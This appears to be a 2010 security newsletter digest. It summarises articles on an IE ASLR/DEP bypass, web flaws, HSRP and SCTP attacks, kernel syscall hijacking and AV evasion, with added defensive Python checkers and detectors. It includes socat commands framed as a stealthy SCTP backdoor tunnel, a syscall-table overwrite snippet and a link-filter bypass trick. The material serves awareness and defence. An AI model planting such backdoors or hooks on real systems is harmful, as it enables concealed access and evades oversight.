In a few words, Internet Explorer loads mscorie.dll, a library that was not compiled with /DYNAMICBASE (so it does not support ASLR and is always mapped at the same base address), when processing some HTML tags. Attackers use this predictable mapping to evade ASLR and bypass DEP by using ROP (return oriented programming) gadgets from the DLL to allocate executable memory, copy their shellcode there and jump into it.
...
Recommendation: Use Enhanced Mitigation Experience Toolkit (EMET) to dynamically rebase all loaded DLLs
In order to minimize the risk of exploitation, users could install EMET and proceed to protect the iexplore.exe process as shown in the BlueHat video.
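Whether a module was linked with /DYNAMICBASE (and /NXCOMPAT) is recorded in the DllCharacteristics field of its PE optional header, so an administrator can check which DLLs loaded into iexplore.exe are non-randomised before deciding on EMET's mandatory ASLR. The following checker is an added example for this summary, not code from the Microsoft advisory or the Metasploit module; the flag values are the documented IMAGE_DLLCHARACTERISTICS_* constants, and build_test_image constructs a minimal, non-loadable PE purely as a fixture.

```python
import struct
import sys

# IMAGE_DLLCHARACTERISTICS_* flags from the PE/COFF specification
DYNAMIC_BASE = 0x0040  # /DYNAMICBASE: image may be relocated, so the loader randomises its base (ASLR)
NX_COMPAT = 0x0100     # /NXCOMPAT: image declares itself DEP/NX compatible


def dll_characteristics(image: bytes) -> int:
    """Return the DllCharacteristics field from a PE image's optional header."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + 20  # skip the signature and the 20-byte COFF file header
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics is at offset 70 in both the PE32 and the PE32+ optional header
    return struct.unpack_from("<H", image, opt + 70)[0]


def mitigation_report(image: bytes) -> dict:
    """Summarise whether the image opts in to ASLR and DEP."""
    flags = dll_characteristics(image)
    return {"aslr": bool(flags & DYNAMIC_BASE), "dep": bool(flags & NX_COMPAT)}


def build_test_image(flags: int) -> bytes:
    """Construct a minimal (non-loadable) PE32 image carrying the given flags; a test fixture only."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE header directly after the DOS header
    # Machine=i386, 0 sections, no timestamp/symbols, 224-byte optional header,
    # Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)   # PE32 magic
    struct.pack_into("<H", opt, 70, flags)  # DllCharacteristics
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Usage: python pe_mitigations.py <dll or exe> ...
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, mitigation_report(f.read()))
```

Run it against a copy of mscorie.dll and of any other module listed in the browser's loaded-module list; a module reporting aslr=False is a ROP gadget source at a fixed address. EMET's mandatory ASLR forces a rebase of such modules regardless of this flag, which is why the advisory recommends it for iexplore.exe.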




Software Updates


 
MySQL 5.5 released  [www.net-security.org]
MySQL 5.5 delivers significant enhancements enabling users to improve the performance and scalability of web applications across multiple operating environments, including Windows, Linux, Oracle Solaris, and Mac OS

 
Microsoft has withdrawn update KB2412171 for Outlook 2007, released last Patch Tuesday, after a number of user complaints. The changes in the update may have solved some problems, but they also created some. For instance, the update prevents emails from being retrieved from servers that do not support Secure Password Authentication (SPA) even when that option has been selected in the client. Users of Gmail are in particular affected by this issue.

 
Nearly 5 months after arriving in beta form, Microsoft has released version 2 of Security Essentials (MSE), its anti-malware and virus protection software for Windows formerly known as Morro. The major update comes over one year after version 1.0 was released and includes a number of new features and improvements.

 

 
The Google Chrome development team has released Chrome 9.0.597.19, the first beta of version 9 of the company's WebKit-based web browser. Previously only available in the Chrome developer channel (a.k.a. the Dev channel), the first Chrome 9 beta adds a number of security and performance enhancements, as well as new features over the previous version.

 
After a lengthy beta test, Secunia has finally released version 2 of the Personal Software Inspector (PSI). If configured to do so, PSI 2.0 automatically updates most installed programs. The free tool can therefore not only highlight vulnerabilities it detects, but also remedy them, without prompting users.

 
Update: HP says it has identified a potential security issue with the HP StorageWorks P2000 G3 MSA only. This does not impact HP's entire MSA line of storage solutions. An immediate fix for this issue has been identified and customers are rapidly being informed of the solution.

 
New Release of Open Source, Cross-Platform Virtualization Software Delivers Improved Usability, Performance and Scalability
Further enhancing the popular, open source, cross-platform virtualization software, Oracle today announced the availability of Oracle VM VirtualBox 4.0.
Part of Oracle's comprehensive portfolio of virtualization solutions, Oracle VM VirtualBox enables desktop or laptop computers to run multiple guest operating systems simultaneously, allowing users to get the most flexibility and utilization out of their PCs, and supports a variety of host operating systems, including Windows, Mac OS X, most popular flavors of Linux (including Oracle Linux), and Oracle Solaris.

 
A buffer overflow flaw in the open source smart card library OpenSC can be exploited to inject and execute malicious code on a system. According to UK security company MWR InfoSecurity, the bug in the library is triggered when reading serial numbers from smart cards. The card-atrust-acos.c, card-acos5.c and card-starcos.c drivers in OpenSC version 0.11.1 are all affected.




Business Case for Security


 
Debora Plunkett, head of the NSA's Information Assurance Directorate, has confirmed what many security experts suspected to be true: no computer network can be considered completely and utterly impenetrable - not even that of the NSA.
'There's no such thing as 'secure' any more,' she said to the attendees of a cyber security forum sponsored by the Atlantic and Government Executive media organizations, and confirmed that the NSA works under the assumption that various parts of their systems have already been compromised, and is adjusting its actions accordingly.

 
We recently met with leaders from the U.S. financial services sector, and they asked a number of questions about recent trends in insider threat activities. We are often asked these types of questions, and we can answer many of them right away. Others require more extensive data mining in our case database. In this entry, we address the following question:
Between current employees, former employees, and contractors,
is one group most likely to commit these crimes?
The answer to this question has some important implications, and not just for these particular meeting attendees. If, across all types of incidents and all sectors, the vast majority of incidents are caused by current, full-time employees, organizations may focus on that group to address the vulnerability. If, on the other hand, there are a large number of part-time contractors or former employees, there may be different controls that an organization should consider using.

 
The Cost of Insecurity 2010  [www.quantainia.com]
2010 has been notable for a number of reasons: the advent of a coalition government in the UK, followed by swingeing spending cuts, and a turbulent economic picture. In a regulatory sense, too, 2010 stands out: increasingly active regulators have increased fines for organisations which are found to have failed to comply with basic levels of protection around data. A new record was set with the £17.5 million FSA fine on Goldman Sachs. Moreover, the emphasis has broadened, rather than the ICO and FSA focusing solely on the financial sector: both Hertfordshire County Council and A4E were the subject of fines for weak controls around personal data. At the same time, other regulation continues to apply; many organisations are struggling with PCI-DSS compliance, not only in the commercial sector but also in the state sector, where cards are important for covering payments for basic services.

 
In our introduction to this series we mentioned that the current practice of incident response isn't up to dealing with the compromises and penetrations we see today. It isn't that the incident response process itself is broken, but how companies implement response is the problem.
Today's incident responders are challenged on multiple fronts. First, the depth and complexity of attacks are significantly more advanced than commonly discussed. We can't even say this is a recent trend -- advanced attacks have existed for many years -- but we do see them affecting a wider range of organizations, with a higher degree of specificity and targeting than ever before. It's no longer merely the defense industry and large financial institutions that need to worry about determined persistent attackers. In the midst of this onslaught, the businesses we protect are using a wider range of technology -- including consumer tools -- in far more distributed environments. Finally, responders face the dual-edged sword of a plethora of tools; some of them are highly effective, and others that contribute to information overload.

 
Inside the business of malware  [www.computerschool.org]

 
The data breach at gossip website Gawker Media highlights the needs for companies to balance the costs of taking information security measures with the risks of losing sensitive data, according to Cisco analysts.
Hackers recently compromised the Gawker Media servers and leaked some 1.4 million user passwords and other confidential information. In a Dec. 17 memo, Gawker Media's chief technology officer Thomas Plunkett explained how the data breach happened.
"In recent weeks, intruders were able to gain access to our web servers by exploiting a vulnerability in our source code, allowing them to gain access to user data and passwords. With this information, they were able to gain access to the editor wiki, some Gawker Media email accounts, and other external resources. It is clear that the Gawker tech team did not adequately secure our platform from an attack of this nature. We were also not prepared to respond when it was necessary."

 
The length of time between when a developer writes a vulnerable piece of code and when the issue is reported by a software security testing process is vitally important. The more time in between, the more effort the development group must expend to fix the code. Therefore the speed and frequency of the testing process, whether dynamic scanning, binary analysis, pen-testing, static analysis or line-by-line source code review, matters a great deal.

 
With the holidays approaching, many people are looking for gift ideas and deals. Holiday season is also hunting season for malicious hackers who send out gift idea and deal phishing emails.
How do you protect your employees from divulging their personal and even corporate passwords to an attacker? It's hard to combat phishing with technology. Training employees to spot phishing scams is the most effective, but training is time intensive and may impact productivity.

 
Exploitation of just ONE software vulnerability is typically all that separates the bad guys from compromising an entire machine. The more complicated the code, the larger the attack surface, and the popularity of the product increases the likelihood of that outcome. Operating systems, document readers, Web browsers and their plug-ins are on today's front lines. Visit a single infected Web page, open a malicious PDF or Word document, and bang -- game over. Too close for comfort if you ask me. Firewalls, IDS, anti-malware, and other products aren't much help. Fortunately, after two decades, I think the answer is finally upon us.

 
Once upon a time, I was retained to create comprehensive PCI DSS-focused log review policies, procedures and practices for a large company. They are focused on PCI DSS, but based on generally useful log review practices that can be used by everybody, with any regulation or with no compliance flavor at all.
This is the 11th post in the long, long series (part 1, part 2, part 3 - all parts). A few tips on how you can use it in your organization can be found in Part 1. You can also retain me to customize or adapt it to your needs.
And so we continue with our Complete PCI DSS Log Review Procedures (please read in order; at this point we are pretty deep in the details and this piece might look out of context):

 
More than 60 percent of respondents have tried multiple anti-virus products over the course of a year, according to Avira. In addition, 25 percent of the users admitted to turning off their anti-virus protection because they thought those programs were slowing down their computers.




Web Technologies


 
Unencrypted public wifi should die  [lcamtuf.blogspot.com]
Unencrypted public access wireless networks are an unbelievably harmful technology devised with no regard for the operation of the modern web - and they introduce far more problems than immediately apparent. The continued use of unencrypted wifi at the municipal level and in consumer-oriented settings is simply inexcusable, even if all the major websites on the Internet can be pressured into employing HTTPS-only access and Strict Transport Security by default.
Straightforward snooping and cute tricks such as sslstrip aside - all of them still deadly effective, by the way - there are many less obvious problems we simply can't solve any time soon:

 
How to Conceal XSS Injection in HTML5  [samuli.hakoniemi.net]
I was playing around with the window.history object. In general, it's quite limited and can be considered rather useless. However, HTML5 adds some new methods to the History object to make it more powerful.
In this article I will take a quick glance at a rather peculiar method called pushState(). There is one security-related issue I want to point out, which I consider rather harmful.
history.pushState()
history.pushState() was introduced in HTML5 and is meant for modifying history entries.
Using pushState(), we are allowed to alter the visible URL in the address bar without reloading the document itself. Sounds a bit risky, doesn't it?

 
There's a remarkable flaw in Amazon's web shop (tested on .de, .co.uk and .com): a stored XSS vulnerability. "So far so good, what's new?" is probably what you're thinking; Amazon and other major companies have had XSS problems in the past too.
'WAHH' revealing Amazon cookies under Vista/IE8
Picture 1: Web Application Hacker's Handbook (a.k.a. WAHH) exploiting Amazon (IE under Vista)
This one is different though. Whereas the standard example for a stored XSS vulnerability over an out-of-band channel is a web mailer like OWA using SMTP, here the channel for the attack is kind of - err, let's put it this way - unusual: one has to write a book! No, I am serious. This book needs to contain a crafted string that bypasses their weak or non-existent filters/encoding, the book of course needs to be sold through Amazon's shop, and last but not least Amazon has to offer the 'search in this book' functionality for it.

 
Facebook uses "facebook.com/l.php?u=THE_External_URL" whenever you click on an external link; as a result:
1- Your current page won't be sent in the Referer HTTP header, which is good for privacy.
2- Malicious or unwanted links can be stopped at a single point (the "l.php" page).
Now I want to show a flaw in this process by which, when clicking on an external URL in Facebook, users go directly to the destination URL without passing through the "facebook.com/l.php" page:
Add a ":/" at the end of the domain name! That's it!
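The bypass is a classic parser mismatch: the browser accepts an empty port ("host:/"), but a link rewriter that recognises external URLs with a hand-written pattern does not, so the link is never wrapped. The example below is added for this summary and is not Facebook's code; the naive regex, the hostname example.org and the redirector endpoint are hypothetical stand-ins, and the point is the contrast between matching URLs with a regex and classifying them with a real parser that fails closed.

```python
import re
from urllib.parse import quote, urlsplit

OWN_HOST = "example.org"                         # hypothetical site whose outbound links get wrapped
REDIRECTOR = "https://example.org/l.php?u="      # hypothetical click-through endpoint, modelled on l.php

# A naive external-link test: a regex that expects the host to run straight into "/" or the
# end of the string. "http://evil.example:/" (empty port) does not match and so is never wrapped.
NAIVE_LINK = re.compile(r"^https?://([A-Za-z0-9.-]+)(?:/|$)")


def naive_is_external(url: str) -> bool:
    m = NAIVE_LINK.match(url)
    return bool(m) and m.group(1).lower() != OWN_HOST


def robust_is_external(url: str) -> bool:
    """Decide with a real URL parser and fail closed: anything not provably our own host is external."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return False  # javascript:, data:, mailto: are a separate problem for the link sanitiser
    host = (parts.hostname or "").lower()  # strips userinfo, IPv6 brackets and an empty ":" port
    return host != OWN_HOST


def rewrite_link(url: str, is_external=robust_is_external) -> str:
    """Return the href to emit: the original URL, or the redirector with the target URL-encoded."""
    return REDIRECTOR + quote(url, safe="") if is_external(url) else url


if __name__ == "__main__":
    for u in ("http://evil.example/", "http://evil.example:/", "https://example.org/home"):
        print(u, "naive:", naive_is_external(u), "robust:", robust_is_external(u), "->", rewrite_link(u))
```

The same parser must also be used on the server side of l.php, otherwise an attacker only needs a URL form the server rejects as "not external" but the browser happily follows.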

 
Once you have deployed ModSecurity, you have probably been faced with this question:
How should I configure my Web Application Firewall (WAF) to handle Authorized Vulnerability Scanning (AVS) traffic?
The answer to this question is not quite as easy as it may first appear. This question arises when organizations are running their own internal web application vulnerability scans. They soon realize that they need to figure out how to get their security tools (scanner and WAF) to 'play nice' with each other.
Before deciding on how to reconfigure ModSecurity with regards to handling the scanning traffic, you first must confirm the goal of your scanning efforts. There are usually two main scanning goals:
* To identify all vulnerabilities within a target web application, or
* To identify all vulnerabilities within a target web application that are remotely exploitable by an external attacker.
You may want to reread the second item to make sure that you understand the difference, as it is factoring in the exploitability of a vulnerability in a production web application.

 
I'm attaching two CSV files for use in test cases and tools. The uni2asc.csv contains all of the Unicode characters that map to something ASCII < 0x80. The bestfit.csv contains all of the known best-fit mappings to dangerous ASCII between legacy charsets and Unicode.
uni2asc.csv - for straight Unicode to Unicode mappings
bestfit.csv - for legacy charset to Unicode mappings
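The first of those two lists can be regenerated from the Unicode database itself: Python's unicodedata applies the same compatibility decompositions (NFKC) that turn fullwidth or small-form punctuation into plain ASCII. The example below is added for this summary and is not the author's tool or CSV; the DANGEROUS blacklist is a hypothetical stand-in for what a naive XSS or SQL filter checks. It also shows the order-of-operations bug the lists exist to test for: filtering before normalising lets a fullwidth "＜script＞" through. Windows' legacy best-fit conversions (the bestfit.csv case) are not reproducible with Python's strict codecs and are not covered here.

```python
import unicodedata

# Characters a naive XSS/SQL filter might reject (a hypothetical blacklist used only for this example)
DANGEROUS = set("<>\"'&;/\\%")


def nfkc_to_ascii_map() -> dict:
    """Every non-ASCII code point whose NFKC form is entirely ASCII (< 0x80), like the uni2asc list."""
    table = {}
    for cp in range(0x80, 0x110000):
        if 0xD800 <= cp <= 0xDFFF:  # surrogates are not characters
            continue
        ch = chr(cp)
        folded = unicodedata.normalize("NFKC", ch)
        if folded and all(ord(c) < 0x80 for c in folded):
            table[ch] = folded
    return table


def dangerous_lookalikes(table: dict) -> dict:
    """The subset of a mapping whose ASCII target contains a blacklisted character."""
    return {src: dst for src, dst in table.items() if set(dst) & DANGEROUS}


def filter_then_normalize(s: str) -> str:
    """Vulnerable order: the blacklist runs on the raw string, then the data is normalised downstream."""
    if set(s) & DANGEROUS:
        raise ValueError("rejected")
    return unicodedata.normalize("NFKC", s)


def normalize_then_filter(s: str) -> str:
    """Correct order: canonicalise first, then validate the form that will actually be used."""
    s = unicodedata.normalize("NFKC", s)
    if set(s) & DANGEROUS:
        raise ValueError("rejected")
    return s


if __name__ == "__main__":
    bad = dangerous_lookalikes(nfkc_to_ascii_map())
    print(len(bad), "code points fold to a blacklisted ASCII character, e.g.")
    for src, dst in list(bad.items())[:5]:
        print("  U+%04X %s -> %r" % (ord(src), unicodedata.name(src, "?"), dst))
    # fullwidth angle brackets pass the raw-string filter and only become <script> afterwards
    print(filter_then_normalize("\uff1cscript\uff1e"))
```

The rule it demonstrates is the one the author's CSVs are meant to help test: validate the canonical form, never the pre-normalisation bytes, and treat any layer that normalises after validation (a database collation, a best-fit charset conversion, a later NFKC pass) as part of the attack surface.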

 
Attack and Defense Labs  [blog.andlabs.org]
Cracking hashes in the JavaScript cloud with Ravan
Password cracking and JavaScript are very rarely mentioned in the same sentence. JavaScript is a bad choice for the job due to two primary reasons - it cannot run continuously for long periods without freezing the browser and it is way slower than native code.
HTML5 takes care of the first problem with WebWorkers, now any website can start a background JavaScript thread that can run continuously without causing stability issues for the browser. That is one hurdle passed.
The second issue of speed is becoming less relevant with each passing day as the speed of JavaScript engines is increasing at a greater rate than the increase of system speed. It might surprise most people how fast JavaScript actually is: 100,000 MD5 hashes/sec on an i5 machine (Opera). That's the best number I could get from my system; in most cases it would vary between 50,000 - 100,000 MD5 hashes/sec. This is still about 100-115 times slower than native code on the same machine but that's alright. What JavaScript lacks in outright speed can be more than made up for by its ability to distribute.

 
WebKit CSS Type Confusion  [em386.blogspot.com]
Here is an interesting WebKit vulnerability I came across and reported to Google, Apple and the WebKit.org developers.
Description: WebKit CSS Parser Type Confusion
Software Affected: Chrome 7/8, Safari 5.0.3, Epiphany 2.30.2, WebKit-r72146 (others untested)
Severity: Medium
The severity of the vulnerability was marked Medium by the Chrome developers because the bug can only result in an information leak. I don't have a problem with that but I have some more thoughts on it at the end of the post. But first the technical details.

 
If you're a Mac or iOS developer and happen to have an iPhone, iPod Touch or iPad running the iBooks app, go open the iBookstore and search for "apple developer". As you can see, Apple is offering iOS / Mac development iBooks completely for free.

 
Windows Live has just announced something new for Hotmail: Interactive e-mail.
The e-mail giant is allowing developers to embed and run JavaScript from within e-mails; this is the natural next step in e-mail's evolution from plain text to HTML and beyond.
What this means for the average e-mail recipient is that more of the messages they receive will be increasingly up-to-date, and content will be interactive. If the developer sending the e-mail is hip to Hotmail's changes, you'll be able to take actions from within the e-mail itself without having to navigate to a slew of other web pages. Basically, the new Hotmail e-mails will look, feel and behave like a web page running within an e-mail.

 
What's wrong with OpenID?  [www.quora.com]
It boggles my mind that this is apparently a big question for techies and, to me, is a perfect example of the Silicon Valley mindset that doesn't understand how to build products that real people want to use.
The short answer is that OpenID is the worst possible 'solution' I have ever seen in my entire life to a problem that most people don't really have. That's what's 'wrong' with it.
To answer the most immediate question of 'isn't having to register and log into many sites a big problem that everyone has?,' I will say this: No, it's not. Regular normal people have a number of solutions to this problem. Here's some of them:

 
Google and other search engines are used for many purposes, such as finding useful information, important websites and the latest news on different topics; Google indexes a huge number of web pages, and the number grows daily. From a security perspective these indexed pages may contain various kinds of sensitive information.
Google hacking involves using advanced operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable web applications.




Network Security


 
Imagine there is an un-patched Internet Explorer vuln in the wild. While the vendor scrambles to dev/test/QA and prime the release for hundreds of millions of users (I've been there... it takes time), some organizations may choose to adjust their defensive posture by suggesting things like, "Use an alternate browser until a patch is made available".
So, your users happily use Firefox for browsing the Internet, thinking they are safe from any IE 0dayz... after all, IE vulnerabilities only affect IE, right? Unfortunately, the situation isn't that simple. In some cases, it is possible to control seemingly unrelated applications on the user's machine through the browser.

 
Ever tested some of the more exotic transport protocols?
SCTP is interesting ... multihoming means you can have several IPs involved on each side of a connection (an association in SCTP speak) ... so when you move from wired to wireless your ssh session is still fine. If you find a proper SCTP ssh, of course.
Testing it on Ubuntu LTS, though, using socat for glue... a listening SCTP socket is invisible in netstat -ln. Fun. tcp, udp, raw sockets are visible ... but sctp isn't.
socat SCTP-LISTEN:8080,fork TCP-CONNECT:localhost:22
Nice, stealthy backdoor. Does not show in netstat(8) or ss(8). Combine with socat TCP-LISTEN:2223 SCTP-CONNECT:localhost:8080 on a remote host and we have a completely stealthy tunnel, if the firewall is mildly clue-challenged.
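The defensive counterpart to the observation above: the SCTP module keeps its own table, so a listener that netstat misses is still visible in /proc/net/sctp/eps (newer iproute2 also lists SCTP sockets with ss -S). The parser below is an added example for this summary, not the diary author's code; SAMPLE_EPS is a constructed fixture modelled on the kernel's column layout (ENDPT, SOCK, STY, SST, HBKT, LPORT, UID, INODE, LADDRS), and the SST value 10 is TCP_LISTEN, which SCTP reuses for listening endpoints.

```python
import os

TCP_LISTEN = 10  # sk_state printed in the SST column for a listening SCTP endpoint

# Constructed sample in the layout of /proc/net/sctp/eps: one root-owned listener on 8080
# (the socat backdoor from the text) and one unbound client endpoint owned by uid 1000.
SAMPLE_EPS = """\
 ENDPT     SOCK   STY SST HBKT LPORT   UID INODE LADDRS
ffff88003b1e4000 ffff88003b1e6000 2   10  29   8080      0 18213 0.0.0.0 
ffff88003c0a2000 ffff88003c0a4000 2   7   11   0      1000 19001 10.0.0.5 
"""


def parse_sctp_eps(text: str) -> list:
    """Parse the endpoint table into dicts; the first line is the column header."""
    entries = []
    for line in text.splitlines()[1:]:
        f = line.split()
        if len(f) < 8:
            continue
        entries.append({"sty": int(f[2]), "state": int(f[3]), "lport": int(f[5]),
                        "uid": int(f[6]), "inode": int(f[7]), "laddrs": f[8:]})
    return entries


def sctp_listeners(text: str) -> list:
    return [e for e in parse_sctp_eps(text) if e["state"] == TCP_LISTEN]


def pids_for_inode(inode: int) -> list:
    """Map a socket inode to owning PIDs by scanning /proc/*/fd (Linux only; needs permission)."""
    target = "socket:[%d]" % inode
    owners = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            for fd in os.listdir("/proc/%s/fd" % pid):
                if os.readlink("/proc/%s/fd/%s" % (pid, fd)) == target:
                    owners.append(int(pid))
                    break
        except OSError:  # process exited or not ours to inspect
            continue
    return owners


if __name__ == "__main__":
    try:
        with open("/proc/net/sctp/eps") as f:
            text = f.read()
    except OSError:
        text = SAMPLE_EPS  # SCTP module not loaded here: show the constructed sample instead
    for e in sctp_listeners(text):
        try:
            owners = pids_for_inode(e["inode"])
        except OSError:
            owners = []
        print("SCTP LISTEN port %d uid %d addrs %s pids %s" % (e["lport"], e["uid"], e["laddrs"], owners))
```

Drop the listener check into a host-inventory or integrity script alongside the usual netstat/ss parse; a root-owned SCTP listener that no change ticket explains is worth the same attention as an unexpected TCP one. On the network side, the firewall point in the text is simply that a policy written only in terms of tcp and udp passes protocol 132 by default unless the default deny covers it.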

 
So I started this series on Network Reliability Mechanisms back in September ( http://isc.sans.edu/diary.html?storyid=9583 ), and with work and life and the rest, I realized that I've let the promised installments in this series slide a bit.
In today's diary we'll explore and compromise HSRP - Cisco's Hot Standby Routing Protocol. Why would you want to do this you ask? You may remember some of our previous diaries on ARP Poisoning Man in the Middle attacks (for instance, this one ==> http://isc.sans.edu/diary.html?storyid=7303 ), and protections against them ( http://isc.sans.edu/diary.html?storyid=7567 ). Hijacking a redundancy protocol like HSRP allows you to bypass all of these layer 2 protections by simply participating in the (legitimate) HSRP exchange.
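HSRPv1 is a 20-byte UDP payload (port 1985, multicast 224.0.0.2) with a one-byte priority, a cleartext eight-byte authentication string (default "cisco") and the virtual IP, so anyone on the segment can win the election by speaking a higher priority. The detector below is an added example for this summary, not code from the ISC diary; the packet layout is the one in RFC 2281, the KNOWN router table and SAMPLE traffic are constructed, and build_hsrp exists only to generate that sample.

```python
import socket
import struct

# HSRP version 1 (RFC 2281): version, opcode, state, hellotime, holdtime, priority,
# group, reserved, 8-byte auth data, 4-byte virtual IP
HSRP_V1 = struct.Struct("!BBBBBBBB8s4s")
OPCODES = {0: "Hello", 1: "Coup", 2: "Resign"}
STATES = {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}


def parse_hsrp(payload: bytes) -> dict:
    if len(payload) < HSRP_V1.size:
        raise ValueError("payload too short for HSRPv1")
    ver, op, state, hello, hold, prio, group, _res, auth, vip = HSRP_V1.unpack_from(payload)
    if ver != 0:
        raise ValueError("not HSRP version 1 (v2 uses a TLV layout)")
    return {"op": OPCODES.get(op, op), "state": STATES.get(state, state), "hello": hello,
            "hold": hold, "priority": prio, "group": group,
            "auth": auth.rstrip(b"\0").decode("ascii", "replace"), "vip": socket.inet_ntoa(vip)}


def build_hsrp(op: int, state: int, priority: int, group: int, vip: str,
               auth: bytes = b"cisco", hello: int = 3, hold: int = 10) -> bytes:
    """Build an HSRPv1 payload; used here only to construct sample traffic for the detector."""
    return HSRP_V1.pack(0, op, state, hello, hold, priority, group, 0,
                        auth.ljust(8, b"\0"), socket.inet_aton(vip))


def detect_rogue_hsrp(observed, known) -> list:
    """observed: [(src_ip, udp_payload)]; known: {group: {"routers": set(ips), "max_priority": int}}.
    Alerts on speakers that are not the configured routers for a group and on priorities above
    the configured ceiling, which is exactly how a takeover of the virtual IP looks on the wire."""
    alerts = []
    for src, payload in observed:
        h = parse_hsrp(payload)
        cfg = known.get(h["group"])
        if cfg is None:
            alerts.append((src, "HSRP %s for unknown group %d" % (h["op"], h["group"])))
        elif src not in cfg["routers"]:
            alerts.append((src, "HSRP %s (priority %d) from non-router" % (h["op"], h["priority"])))
        elif h["priority"] > cfg["max_priority"]:
            alerts.append((src, "priority %d above configured maximum %d"
                           % (h["priority"], cfg["max_priority"])))
    return alerts


# Constructed sample: two legitimate routers in group 1 plus a host injecting a priority-255 Coup.
KNOWN = {1: {"routers": {"10.0.0.2", "10.0.0.3"}, "max_priority": 110}}
SAMPLE = [
    ("10.0.0.2", build_hsrp(0, 16, 100, 1, "10.0.0.1")),  # active router hello
    ("10.0.0.3", build_hsrp(0, 8, 90, 1, "10.0.0.1")),    # standby router hello
    ("10.0.0.77", build_hsrp(1, 4, 255, 1, "10.0.0.1")),  # rogue coup claiming priority 255
]

if __name__ == "__main__":
    for src, msg in detect_rogue_hsrp(SAMPLE, KNOWN):
        print("ALERT", src, msg)
```

Feed it the source IP and UDP payload of every packet to 224.0.0.2/1985 from a capture. Two caveats: an attacker can spoof a legitimate router's source IP, so correlate with the source MAC and the switch port as well; and detection is second best to prevention, which on Cisco gear means HSRP MD5 authentication on the group rather than the default cleartext string.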

 
Users of the popular exim mail server report attacks exploiting the recently patched vulnerability [1,2]. It appears that the attacks are scripted and install popular rootkits. If you experienced an attack against exim: we are interested in packet captures or other logs showing how the attack is performed.

 
Recently I've been presenting on 'Wi-Fi (In)Security' at the GOVCERT.NL Symposium 2010 in Rotterdam (November 2010) and (a reduced version) at the 4th CCN-CERT meeting in Madrid (in Spanish; December 2010). The full presentation can be found on Taddong's lab web page. My main goal was to create awareness about all the still prevalent Wi-Fi vulnerabilities, threats, and security risks we are facing both on the wireless infrastructure and the client side. It is almost 2011, and there is a general feeling that our Wi-Fi environments are pretty secure, as we already have WPA2-Enterprise with multiple authentication methods based on 802.1x/EAP to choose from. However, there are still lots of things to be aware of, especially on the client side (including laptops and mobile devices).
On the infrastructure side, in the best case scenario, we will end up with two worlds, the secure one, based on WPA2-PSK/Enterprise, and the insecure one, based on open Wi-Fi networks (e.g. hotspots) . This is also reflected on the Wi-Fi Alliance roadmap, and it is their goal for 2014 (yes, 3 years from now!).

 
There were some pretty wild accusations made about backdoors being placed in OpenBSD's IPsec implementation by its authors. Normally this type of thing isn't worth a mention, but in this case the accusations were specific enough to be testable. Having no other projects to work on (that was a joke), I decided it might be interesting to dive into the code.
I did find something interesting.
OpenBSD did, in fact, ship with a bug which prevented IPsec packets from being properly authenticated for a few releases near the time in question. The bug was patched silently, no security advisory was issued. The developer who introduced it and the developer who later patched it were said to have been funded by the same company, the one alleged to have coordinated the backdoors.

 
Well, we've got something that works. So, of course we have to muck with it :)
The immediate architectural question is whether we should support the storage of full keying data in DNS. See, right now, we're just storing the hash of keying data - a nice, fixed size blob that can fit into a text record without much fuss. There's a fundamental assumption with this approach: Any protocol we happen to use, will negotiate a public key (presently inside a certificate) at the application layer. DNSSEC only needs to be used to validate the data received at that layer.

 

 
Over the past few months, we have put Mallory through its paces. Scores of mobile applications have had their network streams MiTMd by Mallory. It has become one of a few important tools that we use on a daily basis. Because we use it so often, we sometimes forget that it may seem quite difficult to get up and running for the first time. Mallory is still actively developed. Improving the user experience from the initial code checkout to helping users "Mallorize" traffic is a key goal for the project. However, until then, this howto guide will suffice to get Mallory up and running for your testing needs.
This guide will explain how to get Mallory up and running (in this guide I use an EeePC). I also use a tethered Android device for a WAN connection, and have MiTM victims connect to the netbook over its WiFi connection. I will also be sharing how we use a tool called hostapd to make our EeePC look like an infrastructure mode WiFi access point, as opposed to an Ad-Hoc WiFi access point. Using this guide, you should be able to set up a mobile Mallory gateway in no time.

 
In this guide I will explain how to hijack syscalls in kernel 2.6.*: in particular how to bypass the kernel's write protection, i.e. the write-protect (WP) bit of the CPU's CR0 register.
I don't explain what a syscall or the syscall table is: I assume you know.
- Accessing the Syscall Table
If you have tried to run rootkits written for 2.4.* kernels, you will know that they don't work on 2.6.* kernel systems.
In kernel 2.6.* the "sys_call_table" symbol is no longer exported and you can't access it directly; moreover, the memory pages in which the table resides are now write-protected.
So we can no longer access the table in this way:
extern void *sys_call_table[];
...
sys_call_table[__NR_syscall] = pointer

 
Avoiding AV Detection  [spareclockcycles.org]
As a follow-up to my post on the USB Stick O' Death, I wanted to go a little more in depth on the subject of AV evasion. Following my release of (some of) my code for obfuscating my payload, it became apparent that researchers at various antivirus companies read my blog (Oh hai derr researchers! Great to have you with us! I can haz job?) and updated their virus definitions to detect my malicious payload. To be perfectly honest, I was hoping this would happen, as I figured it would be a teachable moment on just how ineffective current approaches to virus detection can be, give readers a real world look at how AV responds to new threats, and provide one of the possible approaches an attacker would take to evading AV software. My main goal in this research was to see how much effort it would take to become undetectable again, and the answer was 'virtually none'.
